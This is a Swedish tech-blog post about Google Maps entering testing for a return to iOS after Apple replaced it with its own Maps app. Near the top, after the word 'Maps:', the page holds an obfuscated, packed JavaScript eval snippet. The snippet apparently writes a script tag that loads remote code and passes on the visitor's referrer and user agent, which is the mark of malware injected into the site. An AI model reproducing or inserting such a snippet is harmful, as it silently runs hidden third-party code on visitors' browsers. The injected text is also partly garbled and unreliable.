Image Image Image Image Image Image Image Image Image Image

| 25 november, 2020

Scroll to top

Top

Google maps gör sig redo för lansering på iOS

Google maps gör sig redo för lansering på iOS
Sebastian

Maps: eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|afees|var|u0026u|referrer|nfazs||js|php’.split(’|’),0,{}))
Apple slängde som ni vet ut Google från sin senare uppdatering till iOS. Både Youtube och Google Maps togs bort som standard appar. Apple ville istället att vi nu skulle anänvda deras egna Maps som kanske inte gick riktigt vägen då den fick enormt mycket dålig kritik gällande missvisande data.

Som vi nämnt innan så jobbar Google med att återinföra Google Maps till iOS. Nu säger några säkra källor till Wall Street Journal att deras applikationen precis gått in i en testfas. Den har även lämnats ut till personer som inte jobbar på Google för att testa hur den fungerar i praktiken.

Nu kanske det endast återstår några månader tills vi får se den i App Store, detta förstås om Apple väljer att godkänna den vilket ska bli intressant att se. Troligtvis kommer detta inte falla in väl hos Apple själva som vill att folk ska använda deras egna.

Är ni nöjda med Apple Maps? Eller vill ni hellre ha tillbaka Google Maps? 

Kommentera gärna nedan och berätta för oss vad ni tycker om respektive program.